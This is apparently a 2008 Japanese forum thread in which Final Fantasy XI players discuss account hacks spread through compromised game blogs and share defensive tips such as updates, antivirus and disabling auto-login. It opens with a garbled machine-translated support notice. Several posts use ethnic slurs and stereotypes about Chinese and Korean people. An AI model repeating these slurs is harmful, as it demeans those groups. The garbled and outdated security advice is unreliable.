このように、我々は、プロセスを考案することができるこれらの選手たちを取り戻すに各自のアカウントにアクセスできるようにします。

効果的なすぐには、プレイオンライン情報センターの支援が開始さを失ったこれらの顧客のアカウントにアクセスできるようにすること。
を通じて身元確認は、プレイオンラインリピートされる情報センターアカウントへのアにより侵害されていますクセスを、元の登録者です。
このプロセスは、現在のところに入って行くのを助ける効果の復元、元のアカウントにアクセスできるように可能な限り速やかに登録します。
1回のアクセスを回復され、顧客は、その後の弁済を求めることができるために失われたアイテムのアイテムごとに私たちの現在の政策を復元します。

プレイオンライン情報センターまでご連絡の場合は、すぐに見つけるのアカウントにアクセスできるようにする必要が失われた。
我々を支援することができることを保証できませんが、これらすべてのケースでは、しかし、我々は、アカウントへのアクセスを試みる際に復元可能です。
また、お問い合わせをできるだけ早く、それは私たちの行動を許可を制限して、アカウントの変更、およびヘルプへのアクセスの復元オリジナルを可能な限り速やかに登録します。

665 名前:既にその名前は使われています [2008/03/25(火) 12:45:28.50 ID:Ev13MfKv]
AVGの無料ソフトをDLしてスキャンしてみたら
>>24のウィルスが見つかったよ
こええええぇぇ
PS2ユーザーだから良かったものの・・・

666 名前:既にその名前は使われています [2008/03/25(火) 12:46:04.39 ID:pn98/92E]
>>664
日本語でおk

667 名前:既にその名前は使われています mailto:sage [2008/03/25(火) 12:46:06.15 ID:iZibIXDg]
RealPlayerの件。
いつからだか知らんがこっそり11.0.2(6.0.14.802)に更新されてる
(解凍したタイムスタンプを見ると14日以降だと思う)。
エロサイト巡回などでどうしても使う場合は拾いなおしておくこと。

668 名前:既にその名前は使われています [2008/03/25(火) 12:50:53.71 ID:zn2Aq+P2]
ラグナロクオンラインでも垢ハック大流行して、それに嫌気さしてFF11来たのにこれだからなあ・・・

669 名前:既にその名前は使われています [2008/03/25(火) 12:51:49.18 ID:Ev13MfKv]
俺みたいにウィルスソフト高くて買えねー奴は
>>4に書いてる無料のをダウンロードした方が絶対いいよ
有料の方がいいんだろうけど、やらないより絶対マシ

670 名前:既にその名前は使われています [2008/03/25(火) 12:51:59.97 ID:GfU2CfMk]
今は登録者多いネトゲはどこもそうだよ。



671 名前:既にその名前は使われています mailto:sage [2008/03/25(火) 12:52:57.30 ID:1hOfOJoB]
MSEXEC.DLL
SHELL32.EXE
SVCHOST.EXE
SENS.DLL

死亡確認w

672 名前:既にその名前は使われています mailto:sage [2008/03/25(火) 12:53:54.20 ID:1hOfOJoB]
NTTの光プレミアムルーター役立たずだな、おい


673 名前:既にその名前は使われています [2008/03/25(火) 12:55:39.81 ID:LtRgK+Go]
>>652
今フレに連絡入れたらちょうど休みだったみたいで即電話して断られたってさw
帰国子女の奴だから英語GM呼んどけって言っといた

674 名前:既にその名前は使われています [2008/03/25(火) 12:56:13.01 ID:GfU2CfMk]
そりゃ設定してなければ素通りですがな。

675 名前:268 [2008/03/25(火) 12:58:29.73 ID:vhRd0OHh]
朝、ここで他鯖に移転させられたことを知った>>268です。
昼休みにサポセン、警察に連絡したので経過をのせときます。

【サポセン】
・本人確認に手間取るもパスワード変更してもらった。
・アカウントの情報は保持するようにしたので警察へ連絡して。
・警察から捜査協力要請きたら協力する。
・犯罪性が確認できたら救済は検討するがどこまでできるかはわからない。
・保留音がグスタで開始当初を思い出し切なくなった。

【警察】
・関係部署にあげてみるが捜査はするかどうかわからない。
・捜査の可否、経過、結果は教えられない。
・管轄警察にはコンピュータに詳しい人はいない。すくえに?何それ?

警察がネック(´・ω・`)めんどくさそうに対応された。
携帯からゆえ改行見づらかったらすまん。

676 名前:既にその名前は使われています [2008/03/25(火) 12:58:40.27 ID:pn98/92E]
>>669
なら何で月額課金ゲームで遊んでるんだよw
フレッツでやってるならフレッツウィルスクリア、ッて言う
月額数百円のウィルスバスターが使える。

677 名前:既にその名前は使われています [2008/03/25(火) 13:00:15.88 ID:auLaoDR9]
だめだこりゃo(`д´o)

678 名前:既にその名前は使われています [2008/03/25(火) 13:00:45.65 ID:Lh3BMw3A]
ねーのかよ糞!!
つながらない!
リアフレに電話してログインしてもらってGM呼んでもらった。
普通プログラム的な対応は時間かかるとしてそれまではアナログに電話で対応できるハック窓口を作るだろ・・・
お客様をなんだと思ってんだ!??
マジ許千    

つか物を業者キャラに渡すんだよな?
だったらそこから追えないの?

679 名前:既にその名前は使われています [2008/03/25(火) 13:02:01.78 ID:44p7HLjp]
ネトゲの苦情は国センじゃねーよ
通産省の情報なんとかっつーとこだ
国センじゃ意味ない、前電話していわれた


680 名前:既にその名前は使われています [2008/03/25(火) 13:03:04.33 ID:gV659xLe]
>・保留音がグスタで開始当初を思い出し切なくなった。

いやがらせかwwwwwww

笑えないな。
警察には多少誇張して素人にもわかりやすいように
「ハッカーにやられました。パソコンの中の情報盗まれました」
とか言ってみたらダメなのかな。ウソではないし。
オンラインゲームとかアカウントとかいうとむこうは「はぁ?」ってかんじになりそ。



681 名前:既にその名前は使われています [2008/03/25(火) 13:04:15.46 ID:zn2Aq+P2]
スクエニ→警察行け^^;
警察→スクエニ?何それ、ゲームごときで警察動かすなよ^^;

駄目だこりゃ

682 名前:既にその名前は使われています [2008/03/25(火) 13:04:53.21 ID:CE2JkWXV]
鯖移動手数料で今月の売り上げウハウハだろうな、■e

683 名前:既にその名前は使われています [2008/03/25(火) 13:12:03.89 ID:J6HuyFWS]
>>682
クレカで勝手に使われた場合、警察・カード会社に連絡したりしても
被害者の救済は無いのかな?

684 名前:既にその名前は使われています [2008/03/25(火) 13:15:15.66 ID:NSDvwDJZ]
>>683
その救済はカード会社がするんじゃまいか?
少なくとも■は登録されたカードから正規のルートで
お金受け取っただけ、ってなるだろうし。

685 名前:既にその名前は使われています [2008/03/25(火) 13:15:17.62 ID:WM1LoyeU]
カード会社が不正使用と認めれば返済される。


686 名前:既にその名前は使われています [2008/03/25(火) 13:15:59.05 ID:OHH8MISE]
ふと思ったんだが、こんだけ大規模なハックが行われてるとこ見ると
相当なアイテム・ギルがだぶついてるよな?

それをRMTで現金化できるくらい「買い手」がいるって事?

被害者からの報告で足が付きやすい上に、油断すればSTTが毎月垢バンしてくる状況。
ギル化したら、すぐに売り抜けたいはずなんだよな。
バハ鯖に一人で4千万ギル相当失った奴もいるし、消費がどうにも追いついてなさそうなんだが。

荒らされまくってるJPでこんだけ売り上げが出せるとは信じたくないし
EU・NA圏で売りさばいてるんかな。向こうじゃ垢ハックは下火?てか俺ら民族単位でカモ?

稼ぐ連中と売る連中で意思統合されて無く、前者が調子乗ってるだけってオチもありそうだが・・・

687 名前:既にその名前は使われています [2008/03/25(火) 13:18:54.97 ID:WM1LoyeU]
>>686
ヒント:
RMTしてまでゲームしてくれる客は依存度が高い客。
なるべく数は減らしたくない。

688 名前:既にその名前は使われています [2008/03/25(火) 13:20:39.74 ID:J6HuyFWS]
>>684-685
ありがd。
ちょっと安心したけど、やっぱりハックされないように心がけるのが
一番だよね。

>>685
IDがWMなのにカード詳しいですね。

689 名前:既にその名前は使われています mailto:sage [2008/03/25(火) 13:22:25.37 ID:V1FUYBaL]
>>686
>てか俺ら民族単位でカモ?
ウェッブは世界規模で広がっているのですよ?

「アカを知らない連中は全員アカだ」という名言がありますが、ことウェッブ上では
「中華を知らない連中は全員中華だ」と言っても過言ではない。

ちなみに、(リネのニュースで出た話だが)業者の下っ端の給料は苦力だから恐ろしく安い。
つまり何であれ売り抜けた時点で即純収入になる。

690 名前:既にその名前は使われています [2008/03/25(火) 13:27:36.17 ID:MjQNpCSt]
ブラウザってなんでIEだとアウトでOperaだとセーフなの?
罠の仕組みがわからん。。



691 名前:既にその名前は使われています mailto:sage [2008/03/25(火) 13:27:45.87 ID:tJZXnsSE]
>>686
日本人は何事もすぐに情報を持ち寄って攻略し、効率的な手段を構築する
そしてセキュリティ対策に疎く、泣き寝入りが多い
更に失ったらもう一度再構築することで満足感に浸る

これ以上のカモ民族が他にいようか?

692 名前:既にその名前は使われています [2008/03/25(火) 13:30:40.23 ID:GfU2CfMk]
>>690
単純に言うとIEの弱点を突くから。
Operaにも弱点はあるが、IEに比べれば
使っている人間の数が少ない、なので狙う方もIEを狙う。

693 名前:既にその名前は使われています mailto:sage [2008/03/25(火) 13:32:29.27 ID:V1FUYBaL]
おっと、「中華を知らない奴は全員カモだ」に変換おながいします。

>>690
IEはゲイツと愉快な下っ端たちによって多数のMicrosoft社製ソフトと互換させるように作っている。
でそれらが残らずセキュリティホール持ちだったというわけだ(有名なのにActiveXがある)。
>>691
・Wikiが性善説のユーザーによって成り立っていると思い込んでいる
・近視眼的(自分の身に降りかかるほど近くまで侵食されないと努力したがらない)
も。

694 名前:既にその名前は使われています mailto:sage [2008/03/25(火) 13:34:18.39 ID:iZibIXDg]
>>691
世界最低の検出率を誇るソースネクストウイルスセキュリティや
公式でウイルスばら撒く台湾ウイルスバスターが
ランキング上位を占めてるしなぁ。
ttp://bcnranking.jp/category/subcategory_0019.html

695 名前:既にその名前は使われています [2008/03/25(火) 13:37:47.39 ID:gnv8Cqm9]
公式発表マダー?

696 名前:既にその名前は使われています [2008/03/25(火) 13:38:15.50 ID:/z/ByKzc]
>>695
英語版サイトにはもうきてる
日本は放置

697 名前:既にその名前は使われています [2008/03/25(火) 13:52:39.37 ID:fAiOj5Ix]
>>696
慎重に検討を重ねまくってるんじゃね?
あと10年ほど

698 名前:既にその名前は使われています [2008/03/25(火) 13:54:34.46 ID:OHH8MISE]
>>689
つまり中華は世界中で垢ハックしてるが、今でも世界中にRMT顧客が絶えず付いてて
(中華にとって)十分な金を落としてるって事か?

>>691
>そしてセキュリティ対策に疎く、泣き寝入りが多い
セキュリティに疎いのは日本だけなの?
イギリスのフレは「よーわからん フリーソフトが人気だからそれ入れてる」
とか言ってた。
泣き寝入りは同意だな・・・

699 名前:既にその名前は使われています [2008/03/25(火) 13:56:56.46 ID:2UE3q0B9]
ハゲガル云々まで話が広がってるみたいだが、とりあえず使ってない倉庫キャラを消すところから
始めようと思う。
みんなもいるだろ?よく考えて見ればゴミばっかり詰まってるキャラ

700 名前:既にその名前は使われています [2008/03/25(火) 14:01:13.00 ID:cG7zxlfp]
>>331
俺、先日から2回垢ハックされたんだが、
1回目は垢ハック後パスワード変更されてサポセンに電話するしかなかったが、
2回目は俺がログイン中の垢ハックだったのでログイン合戦を繰り返して
20分ほどでハッカーがあきらめてくれたようだ。
で、自動ログイン設定を解除した上でパスワードを変更し、
そのままGMコールをしたところ、5人待ちだったけど、
結構5分後くらいには来てくれたよ。
いかにも優先順位が高いので素っ飛んできましたっていう印章だった。



701 名前:既にその名前は使われています mailto:sage [2008/03/25(火) 14:07:00.66 ID:xV7avn5I]
2回されるって、どんだけセキュリティ甘いんだよw

702 名前:既にその名前は使われています mailto:sage [2008/03/25(火) 14:08:20.49 ID:iZibIXDg]
>>698
何年も前のデータだとこんな感じだった。
米 1000億円 →中国
韓 1000億円 →中国
日 100億円 →中国
今はもっと額が増えてるんじゃないかな。特に出遅れてた日本は。
日本では今ひとつな洋ゲー(WoWやLotROやSecondLifeなど)でも
アカハックは普通にある。

>イギリスのフレは
ヨーロッパはAntiVir、avast、AVG、BitDefender
その他もろもろを入れるのに抵抗ないからねぇ。
言語的に。英国製だとSophosくらいしか聞いたことないけど。

703 名前:既にその名前は使われています [2008/03/25(火) 14:10:39.07 ID:GjK/r663]
もう業者じゃないな。一般の様々な業者に失礼。
FF内での規約違反だけに足らずに、リアルでの犯罪者共だからな。
奴等から買ってるRMT倫理委員会(笑)も然り。

704 名前:既にその名前は使われています [2008/03/25(火) 14:12:25.74 ID:cG7zxlfp]
>>701
環境を書こうか。
1回目は、
・WinXP SP2 update全くしとらず
・アンチウイルスソフトはavast!の最新版最新定義ファイル
・ルーターの下流に接続されたPC
・POLは自動ログイン設定にしていた
この環境で垢ハックされたので、以下の対策を施した。
・Win updateを行った
・avast!でフルスキャンかけてマルウェアを3つみつけ削除した
しかしすぐその2日後にまた垢ハック。
これではいかんということで、さらに以下のように対策。
・アンチウイルスソフト「F-secure」でフルスキャンし
 さらに12個のマルウェアを検知・削除
・POLの自動ログイン設定を解除し、毎回手入力でパスワード入力すること
この対策を行ってから約3週間経つが垢ハックされていない。

705 名前:既にその名前は使われています [2008/03/25(火) 14:13:15.92 ID:EH31oboY]
>>700
余程マヌケなんだなお前。パパのパソコン勝手にいじってるのか?


706 名前:既にその名前は使われています mailto:sage [2008/03/25(火) 14:15:57.04 ID:xV7avn5I]
>>704
いやいや、そういう意味じゃなくって、1回目の時点で、怪しいサイトみるなよ。
そこまでできるなら、毎回ソースチェックかけるとかさ・・・。

そういうの全部やってて、垢ハックくらってるなら、おまいさんはすーぱーはかーに狙われてるw
つーか、そこまでして狙われる資産を知りたい。

707 名前:既にその名前は使われています [2008/03/25(火) 14:15:57.14 ID:fAiOj5Ix]
>>700
そんなあなたにPeerGuardian2おぬぬめ

708 名前:既にその名前は使われています [2008/03/25(火) 14:16:06.77 ID:fUj7j779]
>>704
おい・・1回目と2回目の間でパス変更してないじゃないか

709 名前:既にその名前は使われています [2008/03/25(火) 14:16:29.47 ID:hs/jxftM]
avast!?はザルに近いから信用しちゃ駄目

710 名前:既にその名前は使われています [2008/03/25(火) 14:16:53.72 ID:cG7zxlfp]
>>705
700がマヌケというより、ちゃんと対策を施しても
垢ハックされるときはされるという例だろう。
あと、avast!+windows update最新にしててもダメだっていう
例示でもある。
700が言いたいのは、
・カスペエンジン搭載クラスの高レベルのアンチウイルスソフト推奨
・自動ログイン設定はするな
ということじゃないかな。



711 名前:既にその名前は使われています [2008/03/25(火) 14:18:53.18 ID:cG7zxlfp]
>>706
怪しいサイトはみてないよ。
avast!で検知できなかったマルウェアがF-secureで検知されただけだと思う。
>>707
検討してみます。
>>704
あ、ごめんw 当然のことだから書きわすれてたw
だいたいサポセンに電話した時点でパスワード変更されるのは自明な
ことだしw

712 名前:既にその名前は使われています [2008/03/25(火) 14:22:35.23 ID:KvRYpdDq]
>>711
ハードディスクのオールクリア&再インスコはしたのです?

713 名前:既にその名前は使われています [2008/03/25(火) 14:25:04.07 ID:qjtmYPzf]
>711
avast!、F-secureで検知&駆除できなかったものがまだあるかもしれない
駆除できてもOSの一部が壊されてる場合も・・・
HDDフォーマット&OS再インストールしたほうが・・・

714 名前:既にその名前は使われています [2008/03/25(火) 14:25:19.54 ID:5BeXpZgU]
2回目にハックあったときも自動ログインにしてましたか?

715 名前:既にその名前は使われています [2008/03/25(火) 14:32:58.34 ID:GfU2CfMk]
最近の世界的な業者の狙いは管理の甘いゲームアカウントを取って
そこから芋づる式にクレジットカードやその他の個人情報を抜き取る
という方向にシフトしてるらしいからRMT市場だけではないんじゃないかな。

716 名前:既にその名前は使われています mailto:sage [2008/03/25(火) 14:34:37.12 ID:hdp/xFH/]
>>715
クレカで払い続けている人は、猛省した方が良いだろうな。
自分はクレカで払っていたが、Webmoneyに変更した。

いつかはクレカの被害に移っていくはず

717 名前:既にその名前は使われています [2008/03/25(火) 14:54:38.49 ID:eB4wriae]
>675
警察の生活安全課ってのは新米とか飛ばされた奴とか、
そんなのが大勢いる。つか、自分の仕事自体がわかってないのもいる。
対策としては、まず始めに各県の県警本部に電話で連絡して、
どうしたら良いのか聞く。さすがに県警本部の連中はプロなので、
的確に対応してくれる。その時に対応した人の名前をメモっておいて、
地域の警察署に行き、その人の名前を出しながら話を優位に進めた方が良い。

718 名前:既にその名前は使われています [2008/03/25(火) 14:56:43.57 ID:KvRYpdDq]
どのサイトが改竄されたかの一覧がもう張られなくなってるので張ってみる。

■改竄被害ブログ一覧
 黒猫奮闘記 (インラインフレーム・1回改竄され修正済み)
 ぺってん (インラインフレーム・1回改竄され修正済み)
 戦士スキー(インラインフレーム・2回改竄され修正済み)
 某青魔道士(インラインフレーム・2回改竄され閉鎖)
 ペコろぐ。(Javaスクリプト・1回改竄され修正済み)
 ヴァナモンblog(Javaスクリプト・1回改竄され修正済み)
 ある黒魔道士の軌跡(インラインフレーム・1回改竄され修正済み)
 FF11初心者の館(Javaスクリプト:改竄されてウィルスまきちらし中)
 Lostfr【誰か】かまって【くれませんか?】(Javaスクリプト・1回改竄され修正済み)

修正あればよろしく。

719 名前:既にその名前は使われています mailto:sage [2008/03/25(火) 14:56:49.77 ID:iZibIXDg]
>>8 のサイバーなんちゃらに話通さないとね。


720 名前:既にその名前は使われています [2008/03/25(火) 15:01:24.50 ID:AYjZnBwT]
>>718
FC2FFブログ大手を軒並みじゃなくて、聞いたこともないのが混じってるあたり
全てのFC2ブログをハックできるわけじゃないような気がする



721 名前:既にその名前は使われています mailto:sage [2008/03/25(火) 15:06:49.37 ID:hdp/xFH/]
ペコー 愛しているよ

722 名前:既にその名前は使われています mailto:sage [2008/03/25(火) 15:12:22.07 ID:iZibIXDg]
>>720
割と大手を食ってるように思える。

723 名前:既にその名前は使われています [2008/03/25(火) 15:20:38.73 ID:tobfKCIJ]
PeerGuardian2って危険IPリストにリネージュなんちゃらって名前が入ったパス入れるようになってるけど
これでPOLにも効果あるの?

724 名前:既にその名前は使われています [2008/03/25(火) 15:20:44.60 ID:QRF6L8mU]
一回かけて150円。結局「大変混みあっています。お掛け直しください。ぶちっ」を10回以上やっても繋がらない。

儲かってそうですね^^

725 名前:700 [2008/03/25(火) 15:26:30.86 ID:cG7zxlfp]
>>712
してません。めんどくさかったので。
>>713
F-secureで検知できてないのがあったとしても、
自動ログイン設定を解除しているので垢ハックされないんでしょうね。
まぁ、ヒマができたら再インスコも検討しますわ。
>>714
はい、2回目のハックまでは自動ログインにしてました。
>>715
まぁおれの場合、ゲームはWinで、
その他はMa cでやってるので問題ないけどね。
最近のMa cはWinもnative起動できるので一台でこれが可能。

726 名前:723 [2008/03/25(火) 15:30:01.40 ID:tobfKCIJ]
PeerGuardian2って危険IPリストにリネージュなんちゃらって名前が入ったパス入れるようになってるけど
これでPOLにも効果あるの?

PeerGuardian2によって危険なIPアドレスへのアクセスを遮断するためのリストです。
利用法については「基本的な対策 - IPフィルタ」を参照してください。
説明 URL
Lineageトロイ lineage....
中国・韓国・台湾 lineage....

ってなってるけど

727 名前:既にその名前は使われています mailto:sage [2008/03/25(火) 15:30:01.68 ID:GO6bIFih]
またこいつか

728 名前:723 [2008/03/25(火) 15:31:08.94 ID:tobfKCIJ]
あー ごめん。このテキストファイルの中に危険IPリストが定義されているのか…


729 名前:既にその名前は使われています mailto:sage [2008/03/25(火) 15:32:54.64 ID:1T0NGHDd]
ちょっと聞きたいことがあるんだけどFF11とは無関係のfc2ブログも危険?fc2以外のブログも危険?
今のところ報告はないけど安全とは言えないって感じかな?

730 名前:既にその名前は使われています [2008/03/25(火) 15:33:52.26 ID:cG7zxlfp]
>>729
Macで閲覧すれば無問題。
Winで閲覧する限り、かならず危険を伴う。



731 名前:既にその名前は使われています [2008/03/25(火) 15:34:52.28 ID:gLU6AqT5]
次スレ立てるときテンプレに>>521を入れて欲しい。
ハックの状況を少しでも絞り込みたい…。

あとこのやりとりも飽きたからテンプレに入れてほしい。
●<もうログインしっぱなしにしとけばいいじゃん
■<FFは後からログインしたほうが優先される

732 名前:既にその名前は使われています [2008/03/25(火) 15:35:13.19 ID:pn98/92E]
「Safari」Windows版にパッチ未提供の脆弱性、アドレスバー偽装など2件
ttp://internet.watch.impress.co.jp/cda/news/2008/03/25/18928.html

733 名前:既にその名前は使われています [2008/03/25(火) 15:35:22.24 ID:DHnWiZWh]
PeerGuardian2入れるとFF起動するのにブロックされてるIPを1個1個解除
するのにものすごい量なのだがみんなどうしてるの?


734 名前:既にその名前は使われています mailto:sage [2008/03/25(火) 15:36:50.24 ID:iZibIXDg]
>>729
FC2フォーラム見てたらリネージュのブログもやられたってよ。
ネトゲ系は大体狙われてんじゃね? ROとかも。

735 名前:既にその名前は使われています mailto:sage [2008/03/25(火) 15:40:14.81 ID:1T0NGHDd]
>>730>>734
やっぱそうか・・・
ありがと

736 名前:既にその名前は使われています [2008/03/25(火) 15:45:30.21 ID:hs/jxftM]
>>733
ある程度の範囲が■eのアドレスだからxxx.xxx.xxx.1-xxx.xxx.xxx.254を許可リストに入れれば良いんじゃね

737 名前:既にその名前は使われています [2008/03/25(火) 15:59:23.11 ID:HImxVR+r]
>>733
WhoisでそのIPアドレスを引くと、
一連のIPアドレスが誰の所有になってるか出る。
そのアドレスの範囲を指定すればよろし。

738 名前:既にその名前は使われています [2008/03/25(火) 16:00:23.49 ID:gV659xLe]
100%ウィルスを防ぐ方法は無い!だが極力防御を固めてスキを与えなくすることは出来る!

1)今すぐWindowsUpDateしましょう。今すぐ。
 XP:スタート→コントロールパネル→セキュリティセンター→左側のヘルプ項目の中の「WindowsUpDateから最新の〜」
 他:知らん
2)今すぐアンチウィルスソフトを導入&最新のバージョンに。ウィルススキャンもしよう。今すぐ。
3)今すぐPOLの自動ログインを切ってパスを毎回手で入力するようにしよう。パスも変えてしまうと良いですね。今すぐに。
4)その際スクリーンキーボードを使うとGOOD!キーボードは非推奨です。
 ※スタート→すべてのプログラム→アクセサリ→ユーザー補助→スクリーンキーボード
5)面倒ですが毎回パスを入力する羽目になります。そん時もスクリーンキーボードつかえばなお安心!

ベターなアンチウィルスソフトとかは諸説あるから好きに決めましょう。何でも無いよりマシ!
○○してるから大丈夫だよね!ってひとはヤバイです。
すなわちこれやってるから安心ってわけでもないです。ウィルスや散布方法は日々変わっています。常に警戒を怠らないでね!
他にもマメにパスを変えるとか色々あるよ〜自衛しよう!

739 名前:既にその名前は使われています [2008/03/25(火) 16:04:50.12 ID:GjK/r663]
ブロックに、リネ資料室さんのリネトロイとシナチョン台湾だけなら
FF普通にログインできるんだが、俺だけなのか。

740 名前:既にその名前は使われています [2008/03/25(火) 16:05:17.22 ID:yuQmWgMr]
>>738

1)今すぐWindowsUpDateしましょう。今すぐ。
 XP・Vista:スタート→すべてのプログラム→Windows Update
 他:知らん




741 名前:既にその名前は使われています [2008/03/25(火) 16:06:19.89 ID:gLU6AqT5]
>>739
俺もリネ資料室の手順どおりに導入して普通にログインできてる。

742 名前:既にその名前は使われています [2008/03/25(火) 16:07:28.05 ID:cG7zxlfp]
>>738
>3)今すぐPOLの自動ログインを切ってパスを毎回手で入力するようにしよう。パスも変えてしまうと良いですね。今すぐに。

ちょっと待て。それじゃ意味がない。
順番は、
(1)自動ログイン設定をOFFにする
(2)パスワードを変更する
(3)以降、パスワードは手動入力してPOLにログインする
この順番じゃないとダメ。
とくに(2)のあとに(1)をやっても無意味。

743 名前:既にその名前は使われています [2008/03/25(火) 16:08:20.97 ID:GO6bIFih]
>>739
俺もFFに関して解除とかした記憶がないんだがブロックされてるってのが何故かわからん
>>733
許可の垂れ流しを見てブロックされてるって勘違いしてないよな?

744 名前:既にその名前は使われています mailto:sage [2008/03/25(火) 16:10:46.48 ID:YCgkVOG/]
PS2でやってる分には安全なの?

745 名前:既にその名前は使われています mailto:sage [2008/03/25(火) 16:11:29.00 ID:OoZjY94u]
グーグルで検索開く時はキャッシュを開く
PCスタンバイにする時はLANケーブルだけぬいとく。
java.comでjavaの更新
peer guadian2
antivir
メジャーすぎてIE6はやばいし古いのでからIE7にする。
ポップアップブロック広告設定
java off設定
iframe off設定
緊急ログイン用PS3購入 (■一押し推奨w)
ルーターでps2とパソコンをつなげない

746 名前:既にその名前は使われています [2008/03/25(火) 16:12:26.23 ID:gV659xLe]
>>740
>>742
ごめんwww でも色々ツッコんでください。俺も勉強したい。だれか直してくれても全然いいし。
情報錯綜しまくりなのでまとめたかった。手入力とかワロスwwwwって言ってる奴もいるしな〜
なにやっても無駄wwwってのもわかるけど、やっといたほうがいいことってあるよね。

747 名前:既にその名前は使われています mailto:sage [2008/03/25(火) 16:13:23.82 ID:OoZjY94u]
real one playerのアンインストールもしなきゃ

748 名前:既にその名前は使われています [2008/03/25(火) 16:14:01.66 ID:/z/ByKzc]
PS3…だと…?

749 名前:既にその名前は使われています [2008/03/25(火) 16:14:24.41 ID:iK1zczLu]
ブログではてなを利用してるんですが、これまではてなブログでハクられた
ケースって聞いたことありますか?

750 名前:既にその名前は使われています [2008/03/25(火) 16:14:49.54 ID:GjK/r663]
>>733,741
設定が違うのかね?リストにはこの2行のみ。

シナチョン台湾
tp://lineage.nyx.bne.jp/misc/security/cnkrtw.txt
リネージュトロイ
tp://lineage.nyx.bne.jp/misc/security/lintrojan.txt



751 名前:既にその名前は使われています [2008/03/25(火) 16:15:26.65 ID:0ryBVCpV]
海外では全く被害がないという不具合

752 名前:既にその名前は使われています mailto:sage [2008/03/25(火) 16:15:27.50 ID:OoZjY94u]
ツール→インターネットオプションを選択。
 ・セキュリティタブをクリックし→「レベルのカスタマイズ」ボタンをクリック。
 ・ずーっと下の方にスクロールさせていくと、「その他」の項目に
  「IFRAMEのプログラムとファイルの起動」という項目がありますので
  「無効にする」を選んでOKボタンをクリック。

753 名前:既にその名前は使われています mailto:sage [2008/03/25(火) 16:18:05.16 ID:GO6bIFih]
ググれかす

754 名前:既にその名前は使われています mailto:sage [2008/03/25(火) 16:19:28.51 ID:GO6bIFih]
>>753は誤爆だすまん

755 名前:既にその名前は使われています [2008/03/25(火) 16:20:36.54 ID:EH31oboY]
>>753
ググって出てきたFC2のブログで感染したんだけど^^;

756 名前:既にその名前は使われています mailto:sage [2008/03/25(火) 16:25:10.33 ID:iZibIXDg]
FC2スレとマルチになるけど、FC2ブログに仕掛けられたうち最も新しい物、
現時点(25日16:00)でのfccja(製造23日5:50、提出23日14:00〜14:20)のスキャン。

1. 敵のサーバから降ってきて実行されるexe
ttp://www.virustotal.com/analisis/72233d709737ad9281f40173f9365136
2. exeが実行され投下されるトロイ本体のdll
ttp://www.virustotal.com/analisis/626d786492a4b1e7a8bc9713fe3177bf

1.は感染しそうな時点でのアンチウイルスの「検知」による阻止を、
2.は感染した後でアンチウイルスを入れた状況を想定してほしい。
「駆除」は2.のほうが大事だと思うが、微妙に落ちる。

757 名前:既にその名前は使われています [2008/03/25(火) 17:00:02.79 ID:gG9qutBm]
age

758 名前:既にその名前は使われています mailto:sage [2008/03/25(火) 17:00:09.80 ID:gwiQ2FCi]
垢ハックされた場合、本人が連絡してください ttp://live27.2ch.net/test/read.cgi/ogame/1206422526/
ID:OeUFh/Hw=垢ハック業者 ttp://live27.2ch.net/test/read.cgi/ogame/1206426088/
問題は垢ハックではなく、それに対する■eの対応 ttp://live27.2ch.net/test/read.cgi/ogame/1206429905/
垢ハックスレうざい ttp://live27.2ch.net/test/read.cgi/ogame/1206428920/l50
【垢ハック】全鯖合同一斉禿ガルデモ【サポセン】 ttp://live27.2ch.net/test/read.cgi/ogame/1206415973/
■eは速やかに垢ハックに対する声明を発表しろ ttp://live27.2ch.net/test/read.cgi/ogame/1206359298/
■eが日本人だけ差別して垢ハック救済しない件 ttp://live27.2ch.net/test/read.cgi/ogame/1206408219/
垢ハックが仕込まれるいるURLを晒すスレ ttp://live27.2ch.net/test/read.cgi/ogame/1206424684/
フレが垢ハックされました ttp://live27.2ch.net/test/read.cgi/ogame/1206375781/
■垢ハック大流行なのにお前らFFか■ ttp://live27.2ch.net/test/read.cgi/ogame/1206380323/
垢ハックは自己責任ではありません ttp://live27.2ch.net/test/read.cgi/ogame/1206429573/
■e<垢ハックされたのがNAなら救済します ttp://live27.2ch.net/test/read.cgi/ogame/1206406698/
垢ハックされたらageるスレ ttp://live27.2ch.net/test/read.cgi/ogame/1206362574/
垢ハックとか気にするのもう止めようぜ ttp://live27.2ch.net/test/read.cgi/ogame/1206428605/
【みんなで】垢ハック【伝えよう】 ttp://live27.2ch.net/test/read.cgi/ogame/1206379509/
垢ハックされた証拠出せよ ttp://live27.2ch.net/test/read.cgi/ogame/1206380600/
【fc2】垢ハックを報告したり雑談スレ89【.exe】 ttp://live27.2ch.net/test/read.cgi/ogame/1206421637/
垢ハック魔導士強すぎ修正汁 ttp://live27.2ch.net/test/read.cgi/ogame/1206408461/
垢ハックされた人にたいしてはデータを巻き戻すべき ttp://live27.2ch.net/test/read.cgi/ogame/1206431492/
「垢」でスレタイ抽出したらこんななったwさすがに大杉www

759 名前:既にその名前は使われています [2008/03/25(火) 17:01:13.87 ID:Y3Ld5TjI]
>>751
>>553>>664
まったくない訳ではないのかな

760 名前:既にその名前は使われています [2008/03/25(火) 17:03:12.19 ID:GbUm+hdk]
PS2ハックまとめ
・中国人が窓から覗いてハック
・パスうち間違えて偶然ハック
・か○し、か○じょがファックの代償にハック
・母ちゃんがニートの息子にしびれを切らしてハック



761 名前:既にその名前は使われています [2008/03/25(火) 17:07:44.47 ID:V2mh3qpS]
なあ、垢ハックによるキャラの鯖移動って
スクエニに宛ててる業者からの上納金なんじゃないか?w

とりあえず、クレカ利用者はwebマネー払いに変えとこうぜ

762 名前:既にその名前は使われています [2008/03/25(火) 17:08:40.84 ID:6lq0QDhU]
世界のガンだな、中華ってのは。
高級ホテルとかでも中国人旅行客が泊まるときは部屋中の備品という備品を撤去するそうな。
冗談みたいな話、部屋のTVを持って帰ろうとした中国人客がいたとか。


763 名前:既にその名前は使われています [2008/03/25(火) 17:10:08.01 ID:yuQmWgMr]
100%ウィルスを防ぐ方法は無い!だが極力防御を固めてスキを与えなくすることは出来る!

1)今すぐWindowsUpDateしましょう。今すぐ。
  XP・Vista:スタート→すべてのプログラム→Windows Update
  他:知らん

2)今すぐアンチウィルスソフトを導入&最新のバージョンに。ウィルススキャンもしよう。今すぐ。

3)今すぐPOLの自動ログインを切ってパスを毎回手で入力するようにしよう。パスも変えてしまうと良いですね。今すぐに。
  【手順】
  1.自動ログイン設定をOFFにする
  2.パスワードを変更する
  3.以降、パスワードは手動入力してPOLにログインする

4)その際スクリーンキーボードを使うとGOOD!キーボードは非推奨です。
  ※スタート→すべてのプログラム→アクセサリ→ユーザー補助→スクリーンキーボード

